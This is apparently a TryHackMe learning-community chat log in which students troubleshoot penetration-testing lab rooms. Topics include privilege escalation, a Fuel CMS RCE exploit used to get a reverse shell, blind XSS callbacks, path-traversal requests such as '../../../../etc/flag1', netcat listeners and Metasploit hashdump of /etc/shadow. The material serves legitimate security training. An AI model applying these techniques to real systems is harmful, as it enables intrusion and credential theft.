Do you have any personal VPN or similar running on your host machine (the one that is hosting your virtual machine)?
Or another instance of the thm vpn running on your host machine?
Okay, well then that's most likely the cause for your issue.
So turn that off and try ffuf on your attacking machine again
I did, same problem
So is it off right now or on?
it's on
Please turn it off and leave it off for now, then run ffuf again
I'm getting really tired, I will look at it tomorrow, thanks for everything
Thanks for offering; I think I'm just new to the interface and hadn't started the attack machine, or it has expired. When I get time back I'll give it another go, probably just my mistake though.
Gave +1 Rep to @steel nymph
OK, so it really does seem like static-labs.tryhackme.cloud is inaccessible to me, cannot telnet on port 80 or 443 and the link in the exercise appears to go on forever when I try to navigate to it, almost like something is capturing the traffic? I'm going to skip this question and finish the rest of the lessons first. If I missed something obvious, please point it out to me, otherwise I'll write something in the support channel.
is anyone facing issue with browsing any website on the attack box , like the network doesn't have internet connection or timeout ?
Are you a subscriber ?
yup
I just tried it and it seems to work just fine with internet on the attackbox
So maybe just restart it, if you are sure you are a sub
As only subs have internet access on the attackbox
Thanks for replying, I restarted my web Kali machine and will try again.
Gave +1 Rep to @shadow echo
Oh, you are using the kali machine, not the attackbox?
I recommend using the attackbox, since the kali machine is outdated and not getting maintained/updated anymore
okay i will , thanks
Gave +1 Rep to @shadow echo
Is this not how you make a newroot user? This is the Linux privilege escalation room task 5
Remove that random empty line
Still get the same issue
You changed the second instance of the word "root" to newroot too
And you're not showing the issue
okay I went back to only changing the first instance
When I 'su newroot' and it prompts me for the password, it still takes me to root
Yeah. That's the idea.
It's a privesc.
So it's not going to show 'newroot@debian'?
ok
in the windows privilege escalation room I have to put a malicious DLL file in the Temp folder
but Temp is restricted to admin
oh ok there's another Temp folder in C:\ instead of C:\Windows
Hi, does anyone have any notes for the Jr pentest path module that they can share please
Starting to write down your own notes will help you much more
in windows privesc, when I use the command sc start dllsvc it just creates a file named start with dllsvc written in it
weird
if I type sc start whatever it writes whatever in the start file
are you running the sc command in powershell or in cmd???
in powershell
if you are running it in powershell edit the command to be sc.exe start dllsvc
as sc is a cmdlet built into powershell that has the same name as the services executable
Gave +1 Rep to @sage current
no problem
Pretty sure there's a big note in the room about this
Nearly, it's an alias for set-content
oooh thanks for that info james
Knew it was something interfering with it in PowerShell
I can't find it
the note comes in the next task
@merry night There's a note in the task because it's a big area of confusion, but I suspect it's one task too late
Hi learners !
I have no result on the Task 8 "Practical Example (Blind XSS)" even after creating my own web server (nc or python3 -m http.server).
I changed the payload with my own IP and tcp port set, but no result during the request to ticket on my web server... any idea?
it is broken unless you do it on the attackbox instead of your own attack vm
Alright, thanks for your quick answer. I'm gonna try on the attack box
Gave +1 Rep to @sage current
no problem
Probably just being stupid here but, I'm doing the authentication bypass in junior pentest and under bruteforce it says to be in the same directory as valid_usernames.txt but I can't find that file, can anyone help?
Just read that
anyone know why the crack hashes button on crackstation.net is greyed out for me?
Did anyone do the CVE-2018-16763 Fuel CMS exploit recently? I tried a few different scripts, none of them worked, tried also with the installed one, no luck either.
The only thing I could get is phpinfo to display, any other attempt is not working. It prints text but it doesn't exec the command.
Which exploit are you using? If you look at edb there are 3 exploits
I used one already installed on machine, python script that is attempting RCE via /pages/filter URL. Tried couple of other similar scripts none of them worked.
Had issues with this yesterday, but I managed to get it working by using the script installed on the AttackBox
The most I got was phpinfo() page, using link that was provided in github issue on Fuel CMS
I guess will start fresh today and see if I can get it running
Used this one right ?
yep, although I used the shell_me command in order to set up a reverse shell to connect to it
Did you use port 80 ?
no, I think I used port 4444 (but you can use pretty much whatever I think). open another terminal and do e.g. "nc -lvp 4444" and then use your ip + port 4444 in that fuel cms script
ok, will try
Did I do something wrong ?
10.10.20.132 is address of machine I am attacking
oh, lol it's attacking machine right
πΏ
got it
yeah so when doing the reverse shell you need to enter the ip of your own machine (the machine that runs the nc listener, nc -lvp 4444)
nice!!
Did URL attack work for you ?
I tried so many different scripts but couldn't make it
Nothing worked for me except the script that was pre-installed sadly
Yeah but even that script will only work with reverse shell
Yeah I figured it out, never used a reverse shell before
But I am still thinking, if this script is able to open a reverse shell with the same URL, the output of the php system function is somehow omitted or silenced
Well there is not a lot of info, I went through the source code and saw that it allows you to input your own callback function, the exploit is trying to execute the php system function in order to execute shell commands.
that is my guess, but it shouldn't be like that, if you use shell_execute it should be displayed internally maybe
system should return string of actual result
yeah but I wanted to simply exploit it thru the URL, it seems like something was changed, maybe php version no clue.
Since this video is showing that he is able to execute commands and get output at the top of page with similar script :
https://youtu.be/ICjRD0Mwhys?t=687
Room Link
https://tryhackme.com/room/ignite
I already shared timestamp
he used this script
yeah, I did have to fix some things, because python on machine didn't recognize urllib.quote it was moved somewhere else.
and deleted burp proxy same as he did
I have no idea, I even printed the whole page at one point, but the response was so long that terminal wasn't showing top of it
Yeah, the only success that I was able to run directly with URL was phpinfo as shown in original github issue.
https://github.com/daylightstudio/FUEL-CMS/issues/478
the other scripts just improve on this concept and use print + system to execute shell commands
Probably missed something in my thinking
Yeah maybe I will, wasted so much time on this huh
So for this Linux escalation room, task cron jobs file permissions, would I run my netcat listener in my attacking machine?
Yes
Then you should know where to run the listener
If you don't know, you need to go back and study reverse shells again
The IP that you are using as listener is wrong. :)
May I make a suggestion here for the detailing text of the Cross-site Scripting room?
The task in the end may not be that clear for new people
I found a lot of whining on Reddit about nc not working, but actually it does
I know, I solved it, I will write my suggestion in the mentioned channel, thanks @steel nymph
Gave +1 Rep to @steel nymph
Oh, it's not a room, then I will do it after my meetings
Is Metasploit: Exploitation reverse shell task possible with THM attack box ? Like it's suspending machine if you switch from one to another.
Try using the attackbox in full screen, so you don't have to use the tabs in the split view
Thanks
Gave +1 Rep to @shadow echo
I am not able to use the linux/gather/hashdump module as suggested, I am not finding anything online.
Should I run the console with sudo, though this is the THM attackbox machine and I am already logged in as root
You need to be root on the target session
The module reads /etc/shadow on the target, which needs root privileges
oh
yeah I wanted to read that file but it didn't allow me from reverse shell
Well I guess I will run the script with sudo
What's the script in this case? The payload?
yeah, it's elf file
That's not a script, there's a difference between a script and a binary and that's super important. Compiled vs interpreted. Machine code vs text.
Yeah I know the difference just not super good with terminology
@idle bison
Thanks anyway I was able to complete room
Gave +1 Rep to @idle bison
sh-4.1 is the root shell on this machine right? (Task 11 SUID/GUID Executables Known exploits of a Linux Privilege escalation room)
A # in the prompt usually means root, yes. You can also run whoami or id to validate
oh yes of course
Hey
I am not able to do anything when I put http://MACHINE_IP/
not able to continue with the burp exercise
please help me here
You have to press the green "start machine" button and wait for it to show the ip
I am inside the machine
Machine is up, but when I am using the machine IP in the browser it's not showing me anything
I can see the service is running on port 80, ideally http://machine_ip/ should give some response
but I am getting "the site can't be reached"
ip bro ip LOL
You would be surprised how many people are really using "machine_ip" in that URL instead of the real IP
But regardless, if it's showing you the URL with machine_ip you most likely haven't started the target machine yet and substituted the "machine_ip" with the attackbox IP, which would be wrong
But best to verify and show a screenshot
!docs verify
When doing UNION injections, what is the point of having to select multiple columns such as UNION SELECT 1,2,3?
Does it have to do with output? That is my only guess really
Hi, I'm doing Linux PrivEsc and when I do wget on the target machine it says Permission Denied. Can anyone help me.
do you have write permission in the folder you are running wget in???
yes
Done
a screenshot of wget in here.... in the folder you are running it.... together with a ls -lah in said folder
you are trying to put the exploit.c file in the / folder????
obviously you do not have write permission in that folder
put it in /tmp
the left part of your image above is not where you are putting the file on the target machine
and a lot of the time you don't have write perms for any folder except /tmp on your target machine
@sage current You are great
thanks....
yo just one question... how does that green not hurt your eyes lol
I'm used to it. xD
Why isn't it working??
┌──(root㉿kali)-[/home/kali/Downloads]
└─# python -m SimpleHTTPServer 8000
/usr/bin/python: No module named SimpleHTTPServer
because you are calling the wrong thing
I already tried python2 and 3 and it still doesn't work
Yeah. Because that's not the right module
Correct. python3 webserver module
that should be your search term
It might work with py2, but I don't think it's part of the 'default' py2 deployment on kali. Which means you'll need some other way of acquiring the py2 module, as the pip2 mechanisms are now deprecated
┌──(root㉿kali)-[/home/kali/Downloads]
└─# python3 -m http.server 8000
Traceback (most recent call last):
File "/usr/lib/python3.10/runpy.py", line 196, in _run_module_as_main
return _run_code(code, main_globals, None,
File "/usr/lib/python3.10/runpy.py", line 86, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.10/http/server.py", line 1290, in <module>
test(
File "/usr/lib/python3.10/http/server.py", line 1241, in test
with ServerClass(addr, HandlerClass) as httpd:
File "/usr/lib/python3.10/socketserver.py", line 452, in __init__
self.server_bind()
File "/usr/lib/python3.10/http/server.py", line 1284, in server_bind
return super().server_bind()
File "/usr/lib/python3.10/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.10/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
still not working
Says Address already in use, have you tried a different port number?
Something else is using it
strange... hahahha... good answer! thanks
sudo ss -ntlp will print out the listening ports currently in use
But why is the file denied?
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
37292.c: Permission denied
Cannot write to '37292.c' (Permission denied).
Are you sure the directory you're in is writable with your current permissions?
The file has chmod 777 and I'm making the server from root
from the path where the file is
do you think that error is local, or remote?
It may be local I think
I mean the machine you're downloading too, not the attacker perms.
Well, I tried from the root and from /home/matt and it doesn't work
try downloading to /tmp
What did you do different to get it working?
/dev/shm
that's usually a world-writable ramdisk; some system configs disable that
I've realized that privesc is totally new information and very complicated... until now nothing was so painful...
Hi, I'm stuck on a task in file inclusion challenge 1 where I have to change the request to POST. I did that in Burpsuite and wrote to the file: ../../../../etc/flag1 but it doesn't work
looks like that
POST /challenges/chall1.php?file=../../../../etc/flag1
No reason to ask twice in two different learning path channels, that's just confusing
I deleted it in the other channel cuz it was the wrong channel for that
Oops, didn't delete fully
I've done this, I can help if you want
flag1 is a txt file, you need to specify the extension, not sure if anything else is wrong but you would definitely need to add .txt at the end of the file name.
you need to use burp suite
In Windows privesc, how can I connect from my machine using RDP?? I don't remember seeing this way of connecting...
cause the split view from THM isn't working
you can use remmina or xfreerdp, you'll have to lookup the usage/syntax for them :)
May I connect from my Kali machine via terminal using remmina or xfreerdp?
yes, and remmina has a gui but xfreerdp is run from terminal but they both provide a gui connection
Ok, I'll look up then what these remmina and xfreerdp are. Thanks person!!
Gave +1 Rep to @maiden stratus
windows-exploit-suggester.py –update
isn't working
When saying something doesn't work, it helps to show a screenshot of your command + the error
windows-exploit-suggester.py –update: command not found
Did you put ./ in front of the file name when running it?
yes
Using the right python version?
yes
In the same directory as the executable?
Looking at the code now, are you using -update or --update? Because you should be using the latter.
Hello, I am trying to figure out Cross-site Scripting room Task 8.
I am running it on the AttackBox. I am using 10.10.x.x:port for ip in the script. I have tried both nc and python3 http.server. I have checked for syntax mistakes...
Anyone got any Ideas?
/port is incorrect
It's :port
using 8899 on payload and 8890 on listener
oh nvm
can you try listening on 443, it might be wanting a "real" port or others might be blocked by firewall
tho don't think that was needed iirc
ports seem to be working. both nc and http.server
try open port 443? can do.
yeh, but it's likely not the issue just a guess
I've seen walkthroughs do it with 9001 with nc and 8000 with http.server..... 443 didn't work either
Yeh, xss rooms can be buggy or there might be something else, not sure honestly
If none of the SUID binaries in my vulnerable remote machine are listed on the GTFOBins GitHub page under the SUID heading, does that mean I can't use any of the SUID binaries listed in my remote machine to carry out a privilege escalation attack?
I noticed that in screenshot I posted , three of my files say 'root staff' whereas all of the other SUID's list the file as 'root root'? Are those three files out of place?
"shell.elf" lmao
You find that to be a funny name?
No, I find it to be a relatively obvious abusable binary
Well I didn't know
I mean, it's called shell, it's in tmp, it's probably not there by default
Yo does anyone know if you can set Macros with ffuf like with burpsuite?
I need help regarding dnsrecon
Whenever I run dnsrecon, an error occurs: "ModuleNotFound" netaddr
Man, anyone facing issues with the Windows privilege escalation Tib3rius room?
Even other rooms related to Windows privilege escalation
Cuz it can't hold the connection for a long time
Tried to revert the machine, no use
I'm using remmina
xfreerdp as well
If anyone of you had the same issues let me know
Hmm no, I just did it, I had 0 issues with remmina
and shadow has had zero problems with xfreerdp
guess you might have duplicated tun devices making spooks
or is using a vpn on the host machine and the tryhackme vpn in the attack vm
which could also cause problems
I never use the attack VM, only my Kali VM
shadow would state attackbox... attack vm is a short hand for your own kali, parrot, or black arch vm
for shadow that is
oh yeah I scramble words lol
What is the request look like?
The exploit for the Exploit Vulnerabilities module, task 5 practical, is not working, getting traceback errors from the exploit. Any help?
Screen shot please
I'm on SQL injection task 7 and I'm wondering if there's a way to automate the process of trying out characters until the boolean turns to true. I've tried Burp intruder but when it hits the right character it doesn't change in response or status
I know the basics of Python but I've never really scripted anything like that
true
thanks for the tip
not to downplay the importance of scripting but you can use sqlmap too
Sorry I ended up figuring it out a few hours later and didn't update. Thank you for the help though!
Gave +1 Rep to @rustic totem
good morning
I am working on "Walking an Application" and the flag for task 6 does not seem to be working. Does anyone have a solution? I read that there is another flag somewhere but I only see the one.
I found all of them except for the final flag it says it is in the network section and I found a flag there but it does not accept it
no it does not
I just did the Vulnerability Capstone and was wondering if I was missing something. I tried to use the 3 RCE exploits for Fuel CMS 1.4 on exploit-db. The one I could get working was the RCE #3 python one, and managed to connect, but whenever I ran a command it would just reply back 'system'. Tried to run a netcat reverse shell, but it didn't work.
I ended up using the built in capstone exploit to solve the challenge, and used the same exact commands for a reverse shell so I don't think I did that part wrong. Did I not use the RCE exploits right or are they just broken?
For Subdomain Enumeration Task 6, did all of you pipe | the command to the "more" command and scrolled through all 1900 wordlist of code to find the correct subdomain??
Note: I solved it without cheats (online lookup), just asking is there a better way.
You'll now see the article is just made up of the result from the UNION select returning the column values 1, 2, and 3. We can start using these returned values to retrieve more useful information. First, we'll get the database name that we have access to...
Isn't this a bit facetious? Do sites typically run with columns 1,2,3 displaying each piece of data like is shown in the lab?
if you get sql injection probably
It's a bit tricky, I fell for it too. Read the question properly and look at the options on the network section properly.
Yeah often. If you have a catalog of products, for example, the first column in the sql result is likely to be the id, then maybe the product name, a description
So if you selected 1,2,3 then you might see 2 and 3 as the product title and description respectively
field 1 == id
field 2 == username
field 3 == password hash
Another good example
@sage current @idle bison Thank you both for your responses! Haven't worked much with production SQL env's so it's eye opening to me
Gave +1 Rep to @sage current
shadow just assumes that the SQL database/table with the fields shadow specified is very, very common for a lot of websites that need to handle credentials
and luckily not too commonly accessible with SQL injection
I also had issues with the exploit. Tried running a few different Python scripts that use the same route to exploit, but also got just the "system" string printed back. It's actually part of the command you are executing. In the end someone suggested that I use the script that was already installed on the machine for the task; the script had an option to open a reverse shell and that worked perfectly. I wasn't able to figure out why the other options didn't work; it seems like the output of the command was silenced and not printed back in the response.
Yeah, I figured maybe the command output was being obscured somehow, but even running the same netcat reverse shell I used in the machine's script wouldn't work (no connection would be established on the attacking side), so I think maybe there is some sort of issue with the command not reaching the target at all. I just wish I knew why it was doing that, because the question seems to imply that the machine's script was a last resort method if you couldn't figure it out, instead of the only working solution.
Were you able to finish it? Maybe an attacking machine reboot would solve the issue if you are having connection issues. The reverse shell worked the first time for me. I think the reverse shell was not really the intended solution, but it seems that it's the only one currently working.
Can someone help explain why something works on the File Inclusion room for Task 8? I figured out how to get flag3 but I don't understand why I was able to get it one way and not another. I was able to get the flag through burp suite but when I edit the same parameters from my browser I don't get a successful result.
URL encoding, and editing requests in Burp when the browser does not let you edit them in the same way
Maybe you're using POST in Burp, and when you try in the browser it will default to GET
I'm changing the method in the html
since it's explicitly stated with method=GET
and then adding a value field with the payload to the input tag
Yeah I finished it by the time I asked my original question, I was just wondering if anyone knew what was up with the other exploits and why they weren't working
unsure but shadow just downloaded the script from the attackbox so that they have it for future reference....
It ignores the value I add entirely
I don't think you can send a POST with the browser, unless you maybe write a small snippet of JS code that will actually make the request and specify the POST method.
if you just type in URL it will use GET
Nope, you can send POST requests with the browser if your browser is Firefox, using the web development tools
but burp is neater
But if you just try to enter the URL it will default to GET, and yeah, dev tools can be used to replay and send requests. I would also say Burp or Postman is better for this purpose.
OWASP ZAP is also an option, but Burp as stated earlier is neater
thank you for explaining
Tried to figure it out but I didn't invest much time; the only exploit I was able to execute was actually running the phpinfo function, the system function wouldn't give me output as it should.
wonky stuffs ¯\_(ツ)_/¯